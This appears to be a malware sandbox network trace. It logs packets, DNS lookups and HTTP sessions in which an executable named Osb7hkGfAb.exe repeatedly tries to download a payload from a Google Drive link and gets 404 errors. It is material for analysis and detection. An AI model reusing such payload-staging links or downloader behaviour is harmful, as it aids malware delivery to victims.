                                                                        Jan 10, 2025 16:03:37.956068039 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.956118107 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.956423998 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.999320984 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:38.344026089 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:38.344412088 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:38.344423056 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:38.344486952 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:38.344527006 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:38.344531059 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:38.344583988 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:38.344707012 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:38.344707012 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:38.357512951 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:38.357557058 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:38.357878923 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:38.357878923 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:38.357909918 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.049685955 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.049746990 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.050208092 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.050223112 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.050380945 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.050385952 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.485647917 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.485699892 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.485712051 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.485727072 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.485749960 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.485801935 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.486293077 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.486335993 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.486387014 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:49.518327951 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:49.518371105 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:49.519330025 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:49.522780895 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:49.522792101 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.152215958 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.152355909 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.152983904 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.152988911 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.153230906 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.153234959 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.542787075 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.542892933 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.542905092 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.543190956 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.543190956 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.543199062 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.543227911 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.543306112 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.543306112 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.552361965 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:50.552390099 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:50.552557945 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:50.553468943 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:50.553486109 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.238729954 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.238965034 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.240927935 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.240935087 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.241168022 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.241260052 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.241646051 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.283324957 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.653275013 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.653331995 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.653393984 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.653417110 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.653444052 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.654360056 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.654376984 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:01.682600975 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:01.682657003 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:01.682724953 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:01.683113098 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:01.683135033 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.409703016 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.410018921 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.411062002 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.411072969 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.411360979 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.411372900 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.797755003 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.797887087 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.798336029 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.798393965 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.798578978 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.799340963 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.799340963 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.813172102 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:02.813220024 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:02.813298941 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:02.813693047 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:02.813705921 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.444830894 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.444896936 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.445611000 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.445619106 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.445873976 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.445878029 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.868947983 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.869019985 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.869086027 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.869102001 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.869122028 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.869158983 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.871263981 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.871280909 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:13.919028044 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:13.919059992 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:13.919329882 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:13.920027018 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:13.920039892 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.566487074 CET44349991142.250.184.238192.168.2.10
Jan 10, 2025 16:04:14.566678047 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.567277908 CET | 443 | 49991 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:04:14.567363024 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.569288969 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.569299936 CET | 443 | 49991 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:04:14.569725990 CET | 443 | 49991 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:04:14.569778919 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.570324898 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.611325026 CET | 443 | 49991 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:04:14.970143080 CET | 443 | 49991 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:04:14.970230103 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.970247030 CET | 443 | 49991 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:04:14.970284939 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.970345020 CET | 443 | 49991 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:04:14.970390081 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.970937967 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.970952988 CET | 443 | 49991 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:04:14.970963955 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.970999002 CET | 49991 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:04:14.983972073 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:04:14.984036922 CET | 443 | 49992 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:04:14.984133959 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:04:14.984544992 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:04:14.984566927 CET | 443 | 49992 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:04:15.636060953 CET | 443 | 49992 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:04:15.636162996 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:04:15.639920950 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:04:15.639976978 CET | 443 | 49992 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:04:15.640130997 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:04:15.640146971 CET | 443 | 49992 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:04:16.140510082 CET | 443 | 49992 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:04:16.140598059 CET | 443 | 49992 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:04:16.140595913 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:04:16.140625954 CET | 443 | 49992 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:04:16.140650034 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:04:16.140672922 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:04:16.140678883 CET | 443 | 49992 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:04:16.140690088 CET | 443 | 49992 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:04:16.140711069 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:04:16.140732050 CET | 49992 | 443 | 192.168.2.10 | 142.250.186.97
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 16:02:23.746577978 CET | 52757 | 53 | 192.168.2.10 | 1.1.1.1
Jan 10, 2025 16:02:23.753942966 CET | 53 | 52757 | 1.1.1.1 | 192.168.2.10
Jan 10, 2025 16:02:25.065788031 CET | 60223 | 53 | 192.168.2.10 | 1.1.1.1
Jan 10, 2025 16:02:25.073983908 CET | 53 | 60223 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 16:02:23.746577978 CET | 192.168.2.10 | 1.1.1.1 | 0xcf55 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:02:25.065788031 CET | 192.168.2.10 | 1.1.1.1 | 0xc7e2 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 16:02:23.753942966 CET | 1.1.1.1 | 192.168.2.10 | 0xcf55 | No error (0) | drive.google.com | | 142.250.184.238 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:02:25.073983908 CET | 1.1.1.1 | 192.168.2.10 | 0xc7e2 | No error (0) | drive.usercontent.google.com | | 142.250.186.97 | A (IP address) | IN (0x0001) | false
                                                                        • drive.google.com
                                                                        • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49708 | 142.250.184.238 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 15:02:24 UTC | 216 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
2025-01-10 15:02:25 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:24 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: script-src 'nonce-LHjucCHZ2G4GNq3c909kdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49710 | 142.250.186.97 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 15:02:25 UTC | 258 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
2025-01-10 15:02:26 UTC | 2225 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFIdbgR8Md_kYyzkQHPJy7LqpY8sov7GfnKuFPC628Gfq7ohmnTOKXT-3Tum-SBFUE6BBTg4wLX_lOQ
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:25 GMT
                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-77mX5IRpx2Zk0xzZUVtWDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Set-Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE; expires=Sat, 12-Jul-2025 15:02:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
2025-01-10 15:02:26 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 50 74 50 6a 71 76 51 75 52 4d 69 4f 35 51 4f 4f 2d 58 34 45 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5PtPjqvQuRMiO5QOO-X4Ew">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49780 | 142.250.184.238 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 15:02:36 UTC | 417 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
2025-01-10 15:02:37 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:37 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: script-src 'nonce-eMcB8AAgbYNNVjO2vedo7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49787 | 142.250.186.97 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 15:02:38 UTC | 459 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
2025-01-10 15:02:38 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFIdbgT_YcjhY7Kh8rIgy5B11KQr3YrMH03o4_NQfqTWO2XcBH1-xEIvUqMcyHcVdr3gLfxg1QGM3DQ
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:38 GMT
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-LcpPGtFaaY6oAm4ymA8TBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
